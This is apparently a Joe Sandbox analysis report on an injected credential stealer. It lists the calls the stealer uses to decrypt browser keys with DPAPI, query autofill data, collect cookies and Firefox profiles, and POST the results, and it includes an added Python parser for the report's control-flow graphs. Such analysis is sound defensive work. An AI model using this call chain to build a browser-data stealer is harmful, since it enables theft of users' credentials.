                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                        • String ID: *.*$\*.*
                                                                                                        • API String ID: 232625764-1692270452
                                                                                                        • Opcode ID: 3bdf0033c535a28da0ac1e1ed998cf51938018de46afa8a913a1f79e70b4c1ee
                                                                                                        • Instruction ID: 9642967ea16f3511c2b0bba0fca6eaacd13fc69d7678aa0ea5cd1e61ac6ec3cf
                                                                                                        • Opcode Fuzzy Hash: 3bdf0033c535a28da0ac1e1ed998cf51938018de46afa8a913a1f79e70b4c1ee
                                                                                                        • Instruction Fuzzy Hash: 8E31DA34309341DFCB2CFB709888ABF76EA9FC9244F04491DE646C7644DB75C8498691

                                                                                                        Control-flow Graph [graph image not reproduced in text export]
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                          • Part of subcall function 030F1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,030F3E1E,00000000,?,030F3FA8), ref: 030F1C46
                                                                                                          • Part of subcall function 030F1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,030F3FA8), ref: 030F1C56
                                                                                                          • Part of subcall function 030F1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,030F3FA8), ref: 030F1C76
                                                                                                          • Part of subcall function 030F1C31: CloseHandle.KERNEL32(00000000,?,030F3FA8), ref: 030F1C91
                                                                                                          • Part of subcall function 030F2FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,030F3E30,00000000,00000000,?,030F3FA8), ref: 030F2FC1
                                                                                                          • Part of subcall function 030F2FB1: lstrlen.KERNEL32("encrypted_key":",?,030F3FA8), ref: 030F2FCE
                                                                                                          • Part of subcall function 030F2FB1: StrStrIA.SHLWAPI("encrypted_key":",0314692C,?,030F3FA8), ref: 030F2FDD
                                                                                                          • Part of subcall function 030F123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,030F3E4B,00000000), ref: 030F124A
                                                                                                          • Part of subcall function 030F123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 030F1268
                                                                                                          • Part of subcall function 030F123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 030F1295
                                                                                                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 030F3E74
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030F3E9E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                        • String ID: $DPAP$DPAP$IDPAP
                                                                                                        • API String ID: 3076719866-957854035
                                                                                                        • Opcode ID: 855e94855c468a438f9c8edaa161125fee8f8ea86ae0a02d2d4bcac326253604
                                                                                                        • Instruction ID: 6820d4381051ecf6f2020a8f08794b0365ba8b079cb02651fb6828c340eb168f
                                                                                                        • Opcode Fuzzy Hash: 855e94855c468a438f9c8edaa161125fee8f8ea86ae0a02d2d4bcac326253604
                                                                                                        • Instruction Fuzzy Hash: 5A21F636605345AFD715EA688880BBFF2DDAFC8614F48096DEA40D7640EB74C94887A2
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 030F116F
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 030F4BB6
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 030F4BBF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1675517319-0
                                                                                                        • Opcode ID: e3a1fc40703d0a340abc3663ea9b4f46317e157219532f77d3b0ab1b259a30e0
                                                                                                        • Instruction ID: 0835d9231c61dcbb51a1e15de4400d182bc39c24cdd38810792f342126aaf6ac
                                                                                                        • Opcode Fuzzy Hash: e3a1fc40703d0a340abc3663ea9b4f46317e157219532f77d3b0ab1b259a30e0
                                                                                                        • Instruction Fuzzy Hash: C0E0D835802310AFC75CFB31BC08F8B3B9C9FCA265F10C969A75586485CB3948408660
                                                                                                        APIs
                                                                                                        • GetSystemInfo.KERNELBASE(031520A4,00000001,00000000,0000000A,03143127,030F28DA,00000000,?), ref: 030FBFFC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 31276548-0
                                                                                                        • Opcode ID: 32ca2350298fc8a38d57d9493efe8802c05b3eafdaff7d18ad3fb6913fc4fbc1
                                                                                                        • Instruction ID: d3b571db4af1ebcfe598665b97a00a0cbb769ffb498b1ab3ebf43719dfc05fe4
                                                                                                        • Opcode Fuzzy Hash: 32ca2350298fc8a38d57d9493efe8802c05b3eafdaff7d18ad3fb6913fc4fbc1
                                                                                                        • Instruction Fuzzy Hash: 7BE06D36786308BEEE25F3B8AC06FAA14544BC8F11F504B25BB30BC8C9CB9780810022

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 030F3C6A
                                                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 030F3C76
                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 030F3C7D
                                                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 030F3C89
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 030F3D2F
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F3D36
                                                                                                        • wsprintfA.USER32 ref: 030F3D55
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F3D61
                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 030F3D89
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 030F3DB2
                                                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 030F3DED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                        • API String ID: 2923052733-3488123210
                                                                                                        • Opcode ID: bcaef64b74310b8048fdb3a1ce32c7d695d04acf73e8da6199ecc887dacca42f
                                                                                                        • Instruction ID: 49abec0c276c5af93211a2c2c73bfee7f79b6625f76f25a0c2fd089bf255b269
                                                                                                        • Opcode Fuzzy Hash: bcaef64b74310b8048fdb3a1ce32c7d695d04acf73e8da6199ecc887dacca42f
                                                                                                        • Instruction Fuzzy Hash: D641B038605341AFD718FB319C80E7FBAEDAFCA654F04086CFA45AB641DB35C8058762

                                                                                                        Control-flow Graph [graph image not reproduced in text export]
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 030F2AD2
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 030F29E1
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F29EC
                                                                                                        • wsprintfA.USER32 ref: 030F2A38
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F2A44
                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 030F2A6C
                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 030F2A99
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                        • API String ID: 304071051-2605711689
                                                                                                        • Opcode ID: cf9eec4647e86c090521a1d0ce1ffcad5300900fa7925ab8eaae7441e5afa42f
                                                                                                        • Instruction ID: 17e3fce85d160d2b68a60df91b467a0318ab2ba6d3a37f4a3835d1152428830f
                                                                                                        • Opcode Fuzzy Hash: cf9eec4647e86c090521a1d0ce1ffcad5300900fa7925ab8eaae7441e5afa42f
                                                                                                        • Instruction Fuzzy Hash: A851E53860A3479FC729EF319850A3FB7D9AFC9204F080C2DF6859B641DB35C8458762

                                                                                                        Control-flow Graph [graph image not reproduced in text export]
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 030F2D13
                                                                                                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 030F2D45
                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,0314637C,?,00000FFF,?), ref: 030F2D68
                                                                                                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 030F2D7B
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 030F2DD8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                        • API String ID: 2234428054-4107377610
                                                                                                        • Opcode ID: 390cef3dd6cedab0bf82f911d87026efc56d95e1442af745d4de2f30ab6062b3
                                                                                                        • Instruction ID: c48ef4d3b8687fe00b24f1a607115b53819ad17db0b3ef814a984d13081444aa
                                                                                                        • Opcode Fuzzy Hash: 390cef3dd6cedab0bf82f911d87026efc56d95e1442af745d4de2f30ab6062b3
                                                                                                        • Instruction Fuzzy Hash: E331C6387063029FC758FF31981067FB7EAAFC9704F04482DEA466BA81DF7588468752

                                                                                                        Control-flow Graph [graph image not reproduced in text export]
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                          • Part of subcall function 030F106C: lstrlen.KERNEL32(033F734E,00000000,00000000,00000000,030F1366,74DE8A60,033F734E,00000000), ref: 030F1074
                                                                                                          • Part of subcall function 030F106C: MultiByteToWideChar.KERNEL32(00000000,00000000,033F734E,00000001,00000000,00000000), ref: 030F1086
                                                                                                          • Part of subcall function 030F12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 030F12B5
                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 030F13C2
                                                                                                        • wsprintfW.USER32 ref: 030F14B5
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 030F1594
                                                                                                        Strings
                                                                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 030F14FB
                                                                                                        • Accept: */*Referer: %S, xrefs: 030F14AF
                                                                                                        • POST, xrefs: 030F1465
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                        • API String ID: 3833683434-704803497
                                                                                                        • Opcode ID: 91664d73099d40168742daaf3aa9542dbf9b014a7ba731cfa0b33b76ec3571e5
                                                                                                        • Instruction ID: ddcb0be25837f8d8655ed77335b05788eb484d90b12ca0a0c94c34f63212b74a
                                                                                                        • Opcode Fuzzy Hash: 91664d73099d40168742daaf3aa9542dbf9b014a7ba731cfa0b33b76ec3571e5
                                                                                                        • Instruction Fuzzy Hash: 237189B4609341EFD758EF24D884A2BBBE9EFC9748F04092DFA95C7241DB70D9448B62
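The serialized graph at the top of this card is hard to read, but it carries the whole structure of the function at 030F1333: decimal block ids, address ranges, the subroutines each block calls, the Windows APIs it invokes, and `a->b` edges. The string xrefs in the same card place `POST` (030F1465) in block 601, the `Accept: */*` / `Referer: %S` format (030F14AF) in the wsprintfW block 606 and `Content-Type` (030F14FB) in block 611, so a walk from the entry to block 606 follows the path on which the request header is assembled. The parser and path query below are an added example written for this report, not Joe Sandbox code; the graph line above is embedded as its sample input, and the token grammar in the docstring is inferred from this dump rather than taken from any vendor documentation.

```python
"""Parse a Joe Sandbox ``control_flow_graph`` line and query it.

Added example for this report, not Joe Sandbox code.  SAMPLE is the graph of
the function at 030F1333 copied from the report.  Grammar as observed there:
"<id> <start>[-<end>]" opens a basic block (decimal id, lowercase hex
addresses), "call <addr>" is a subroutine call made from that block, any other
identifier is a Windows API the block invokes, and "<a>-><b>" is an edge.
"""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

SAMPLE = """
576 30f1333-30f1385 call 30f1000 call 30f106c call 30f12a3 583 30f1387-30f139e 576->583
584 30f13a0-30f13a3 576->584 587 30f13b0-30f13b2 583->587 586 30f13aa-30f13ac 584->586 586->587
588 30f15cb-30f15da call 30f1011 587->588 589 30f13b8-30f13ef RtlZeroMemory 587->589
593 30f13f5-30f141a 589->593 594 30f15c3-30f15ca 589->594 597 30f15bf 593->597
598 30f1420-30f1456 call 30f10b1 593->598 594->588 597->594 601 30f145d-30f1478 598->601
602 30f1458 598->602 604 30f147e-30f1483 601->604 605 30f15b5 601->605 602->601
606 30f149d-30f14c7 call 30f1000 wsprintfW 604->606 607 30f1485-30f1496 604->607 605->597
610 30f14c9-30f14cb 606->610 611 30f14e0-30f1509 606->611 607->606 612 30f14cc-30f14cf 610->612
618 30f150f-30f151b 611->618 619 30f15a5 611->619 614 30f14da-30f14dc 612->614
615 30f14d1-30f14d6 612->615 614->611 615->612 616 30f14d8 615->616 616->611 618->619
623 30f1521-30f1537 call 30f1000 618->623 621 30f15ac-30f15b0 call 30f1011 619->621 621->605
626 30f1539-30f1544 623->626 627 30f1558-30f156f 626->627 628 30f1546-30f1553 call 30f102f 626->628
632 30f1573-30f157d 627->632 633 30f1571 627->633 628->627 632->626 634 30f157f-30f1583 632->634
633->632 635 30f159a-30f15a1 call 30f1011 634->635 636 30f1585 call 30f104c 634->636 635->619
639 30f158a-30f1594 RtlMoveMemory 636->639 639->635
"""

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ID = re.compile(r"^\d+$")
_ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


@dataclass
class Block:
    start: str
    end: str
    calls: List[str] = field(default_factory=list)  # "call <addr>" targets
    apis: List[str] = field(default_factory=list)   # Windows APIs invoked here


@dataclass
class Graph:
    blocks: Dict[int, Block] = field(default_factory=dict)
    edges: Set[Tuple[int, int]] = field(default_factory=set)

    def successors(self, bid: int) -> List[int]:
        return sorted(d for s, d in self.edges if s == bid)

    def entry(self) -> int:
        """The single block no edge points at: the function prologue."""
        targets = {d for _, d in self.edges}
        roots = [b for b in self.blocks if b not in targets]
        if len(roots) != 1:
            raise ValueError(f"expected one root block, found {roots}")
        return roots[0]

    def exits(self) -> List[int]:
        """Blocks with no successors: the function's return paths."""
        sources = {s for s, _ in self.edges}
        return sorted(b for b in self.blocks if b not in sources)


def parse_cfg(text: str) -> Graph:
    g, cur, tokens, i = Graph(), None, text.split(), 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE.match(tok)
        if edge:
            g.edges.add((int(edge[1]), int(edge[2])))
            i += 1
        elif (_ID.match(tok) and i + 1 < len(tokens)
              and _ADDR.match(tokens[i + 1]) and not _ID.match(tokens[i + 1])):
            # New block.  An all-digit single address would be ambiguous with a
            # block id, but every address in this dump carries a hex letter.
            start, _, end = tokens[i + 1].partition("-")
            cur = Block(start=start, end=end or start)
            g.blocks[int(tok)] = cur
            i += 2
        elif cur is None:
            raise ValueError(f"token {tok!r} appears before any block")
        elif tok == "call":
            cur.calls.append(tokens[i + 1])
            i += 2
        else:
            cur.apis.append(tok)
            i += 1
    return g


def api_blocks(g: Graph) -> Dict[int, List[str]]:
    """Only the blocks that touch a Windows API: the analyst's entry points."""
    return {bid: b.apis for bid, b in g.blocks.items() if b.apis}


def shortest_path(g: Graph, src: int, dst: int) -> Optional[List[int]]:
    """Breadth-first search over edges; None when dst is unreachable."""
    prev: Dict[int, Optional[int]] = {src: None}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path: List[int] = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in g.successors(node):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None
```

On the embedded graph, `parse_cfg(SAMPLE)` yields 36 blocks with one entry (576) and one exit (588); the API-bearing blocks are 589 (RtlZeroMemory), 606 (wsprintfW) and 639 (RtlMoveMemory), and the shortest path from the entry to the wsprintfW block is 576, 583, 587, 589, 593, 598, 601, 604, 606. The same parser applies unchanged to the other `control_flow_graph` lines on this page.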

                                                                                                        control_flow_graph 667 30fb1e5-30fb20b 668 30fb20d-30fb218 call 30faeea 667->668 669 30fb221-30fb22a 667->669 679 30fb21e 668->679 680 30fb3ea-30fb3f0 668->680 671 30fb22c-30fb237 call 30fae65 669->671 672 30fb240-30fb243 669->672 685 30fb23d 671->685 686 30fb3b4-30fb3b7 671->686 673 30fb3b9-30fb3d3 672->673 674 30fb249-30fb26b call 30fa7ae 672->674 678 30fb3db-30fb3df 673->678 687 30fb26d-30fb278 674->687 688 30fb296-30fb29f 674->688 683 30fb3e8 678->683 684 30fb3e1-30fb3e3 678->684 679->669 683->680 684->683 690 30fb3e5-30fb3e7 684->690 685->672 686->673 689 30fb3d5-30fb3d8 686->689 691 30fb27d-30fb291 call 30fa1c6 687->691 692 30fb2d6-30fb2ea call 30f6a5a 688->692 693 30fb2a1 688->693 689->678 690->683 691->686 700 30fb2ec-30fb2f1 692->700 701 30fb2f6-30fb2fd 692->701 695 30fb2a9-30fb2ad 693->695 696 30fb2a3-30fb2a7 693->696 695->686 699 30fb2b3-30fb2b9 call 30fa67c 695->699 696->692 696->695 704 30fb2be-30fb2c2 699->704 700->686 705 30fb2ff-30fb30e 701->705 706 30fb373 701->706 704->692 708 30fb2c4-30fb2d4 704->708 709 30fb377-30fb37a 705->709 706->709 708->691 710 30fb37c 709->710 711 30fb310-30fb329 CreateFileMappingW 709->711 710->686 712 30fb37e-30fb3ab call 30fa1c6 711->712 713 30fb32b-30fb357 MapViewOfFile 711->713 712->686 718 30fb3ad 712->718 713->712 714 30fb359-30fb370 713->714 714->706 718->686
                                                                                                        APIs
                                                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 030FB31D
                                                                                                        • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 030FB34F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateMappingView
                                                                                                        • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                        • API String ID: 3452162329-3826999013
                                                                                                        • Opcode ID: 5d9a49e313ad4357391dc8a7206df97e0803e7b4dfd18dfafe872ae11e8416e0
                                                                                                        • Instruction ID: 9a2e59d0868ad2db7beb8ca8d85ff6f6bcb3305837d1679614c2a213a3ba46d8
                                                                                                        • Opcode Fuzzy Hash: 5d9a49e313ad4357391dc8a7206df97e0803e7b4dfd18dfafe872ae11e8416e0
                                                                                                        • Instruction Fuzzy Hash: DD51D175605701DFDB65DF18C840A6BB7E6FF88314F15882EEA868BA50DBB0E805CF91

                                                                                                        control_flow_graph 719 30fa40e-30fa424 720 30fa426-30fa42a 719->720 721 30fa4a2-30fa4aa 719->721 723 30fa42c-30fa42f 720->723 724 30fa431-30fa441 720->724 722 30fa4ae-30fa4c8 721->722 725 30fa4cc-30fa4e3 ReadFile 722->725 723->721 723->724 726 30fa469-30fa4a0 memcpy 724->726 727 30fa443 724->727 728 30fa4e5-30fa4ee 725->728 729 30fa524-30fa538 call 30fa2aa 725->729 726->722 730 30fa44a-30fa45a memcpy 727->730 731 30fa445-30fa448 727->731 728->729 737 30fa4f0-30fa4ff call 30fa250 728->737 733 30fa45d 729->733 738 30fa53e-30fa553 memset 729->738 730->733 731->726 731->730 736 30fa45f-30fa466 733->736 737->725 741 30fa501-30fa51f call 30fa1c6 737->741 738->736 741->736
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$FileReadmemset
                                                                                                        • String ID: winRead
                                                                                                        • API String ID: 2051157613-2759563040
                                                                                                        • Opcode ID: 74aaa9296d9bef9660fe2cee1c85534f71d5dc46aa1a11b729d9f4fb1c445b8f
                                                                                                        • Instruction ID: d49c1d0db5a03bcb7c8df1efbd533973412858902a2a8f9f79a131fc9c101f3e
                                                                                                        • Opcode Fuzzy Hash: 74aaa9296d9bef9660fe2cee1c85534f71d5dc46aa1a11b729d9f4fb1c445b8f
                                                                                                        • Instruction Fuzzy Hash: 99317F75706340AFC750DE18CC8499FB7EAEFC8310F885928FA998BA50D730ED058B52

                                                                                                        APIs
                                                                                                        • StrStrIW.KERNELBASE(?,?), ref: 030F2E4B
                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 030F2EE4
                                                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 030F2F54
                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 030F2F62
                                                                                                          • Part of subcall function 030F19E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A1E
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A3C
                                                                                                          • Part of subcall function 030F19E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 030F1A75
                                                                                                          • Part of subcall function 030F19E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,030F1AE2,PortNumber,00000000,00000000), ref: 030F1A98
                                                                                                          • Part of subcall function 030F1BC5: lstrlenW.KERNEL32(00000000,00000000,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1BCC
                                                                                                          • Part of subcall function 030F1BC5: StrStrIW.SHLWAPI(00000000,.exe,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1BF0
                                                                                                          • Part of subcall function 030F1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1C05
                                                                                                          • Part of subcall function 030F1BC5: lstrlenW.KERNEL32(00000000,?,030F2E75,PathToExe,00000000,00000000), ref: 030F1C1C
                                                                                                          • Part of subcall function 030F1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,030F2E83,PathToExe,00000000,00000000), ref: 030F1B16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                                                                        • String ID: PathToExe
                                                                                                        • API String ID: 1799103994-1982016430
                                                                                                        • Opcode ID: a0cf236a97787ea5c7e4ccbbf824e68425bb39e9b0ffb1cdbc9d25cedf0e2638
                                                                                                        • Instruction ID: a5ef9be3c427bc9217ceb47c13bd356d40b745efd05663f4ad31448239f51e58
                                                                                                        • Opcode Fuzzy Hash: a0cf236a97787ea5c7e4ccbbf824e68425bb39e9b0ffb1cdbc9d25cedf0e2638
                                                                                                        • Instruction Fuzzy Hash: B231A079606311AF8719EF22C804DAFBAE9EFC9250B04491CF9599B644DB34C906CBE1

                                                                                                        control_flow_graph 782 30fa67c-30fa692 783 30fa694-30fa6bf _alldiv _allmul 782->783 784 30fa6c1-30fa6c4 782->784 785 30fa6c7-30fa6d2 call 30fa33b 783->785 784->785 788 30fa6d4-30fa6df 785->788 789 30fa6f0-30fa6fb SetEndOfFile 785->789 790 30fa6e4-30fa6ee call 30fa1c6 788->790 791 30fa71e 789->791 792 30fa6fd-30fa708 789->792 794 30fa722-30fa726 790->794 791->794 792->791 799 30fa70a-30fa71c 792->799 797 30fa73a-30fa740 794->797 798 30fa728-30fa72b 794->798 798->797 800 30fa72d 798->800 799->790 801 30fa72f-30fa732 800->801 802 30fa734-30fa737 800->802 801->797 801->802 802->797
                                                                                                        Memory Dump Source
